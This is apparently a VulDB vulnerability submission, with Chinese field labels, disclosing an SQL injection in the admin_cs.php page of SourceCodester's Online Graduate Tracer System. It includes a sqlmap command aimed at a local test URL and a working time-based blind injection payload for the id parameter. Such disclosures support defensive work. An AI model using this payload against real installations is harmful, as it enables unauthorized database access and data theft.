| 标题 | SourceCodester Online Graduate Tracer System admin_cs.php sql injection |
|---|
| 描述 | SourceCodester Online Graduate Tracer System admin_cs.php sql injection
url:tracking/admin/admin_cs.php
Abstract:
Line 241 of admin_cs.php invokes a SQL query built using unvalidated input. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.
Explanation:
SQL injection errors occur when:
Data enters a program from an untrusted source.
The data is used to dynamically construct a SQL query.
In this case the data is passed to mysqli_query() in admin_cs.php at line 241.
sqlmap.py -u http://127.0.0.1/shenji/tracking/admin/admin_cs.php?id=1111 --current-db
Parameter: id (GET)
Type: time-based blind
Title: MYSQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id:1111'AND (SELECT 5126 FROM (SELECT(SLEEP(5)))BFUF) ANDIgBK':'IgBK
Download Code:
https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html |
|---|
| 来源 | ⚠️ https://blog.csdn.net/weixin_43864034/article/details/129418770 |
|---|
| 用户 | bit3hh (UID 42576) |
|---|
| 提交 | 2023-03-09 04時54分 (3 年前) |
|---|
| 管理 | 2023-03-09 15時30分 (11 hours later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 222647 [SourceCodester Online Graduate Tracer System 1.0 admin_cs.php mysqli_query SQL注入] |
|---|
| 积分 | 20 |
|---|